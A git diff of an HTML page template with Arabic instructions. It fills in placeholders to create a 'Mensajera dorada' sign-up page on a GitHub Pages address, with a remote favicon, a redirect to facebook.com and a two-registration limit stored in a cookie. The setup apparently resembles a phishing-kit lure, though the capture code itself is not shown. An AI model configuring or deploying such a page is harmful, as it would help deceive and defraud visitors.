--- a/meow-templates-v5.4/index.html
+++ b/meow-templates-v5.4/index.html
@@ -9,14 +9,14 @@
 
 
   <!-- غير الصورة المصغرة -->
-  <link rel="icon" type="image/x-icon" href="favicon.ico">
+  <link rel="icon" type="image/x-icon" href="https://i.ibb.co/mBS7VXF/01b92fe7-e386-4eb9-97f5-47cebf90bb8d.jpg">
 
 
   <!-- ضع العنوان الخاص بك هنا  -->
-  <title> غير هذا النص </title>
-  <meta name="title" content="غير هذا النص">
-  <meta property="twitter:title" content="غير هذا النص">
-  <meta property="og:title" content="غير هذا النص">
+  <title>Mensajera dorada </title>
+  <meta name="title" content="Mensajera dorada">
+  <meta property="twitter:title" content="Mensajera dorada">
+  <meta property="og:title" content="Mensajera dorada">
 
 
   <!-- ضع الوصف الخاص بك هنا  -->
@@ -25,8 +25,8 @@
   <meta property="twitter:description" content="غير هذا النص">
 
   <!-- ضع الرابط المرفوع عليه الموقع -->
-  <meta property="og:url" content="ضع الرابط كامل">
-  <meta property="twitter:url" content="ضع الرابط كامل">
+  <meta property="og:url" content="http://dorada-inscribirse.github.io">
+  <meta property="twitter:url" content="http://dorada-inscribirse.github.io">
 
   <!-- رابط الصورة المعروضة في اللينك -->
   <meta property="og:image" content="رابط الصورة">
@@ -43,7 +43,7 @@
 
   <script>
 
-    const URL = "https://www.google.com"; // أدخل الرابط الخاص بك هنا
+    const URL = "https://www.facebook.com"; // أدخل الرابط الخاص بك هنا
     const LIMIT = "2"; // أدخل عدد التسجيل المتاح
 
     document.cookie = `rURL=${URL},vLimit=${LIMIT}`;
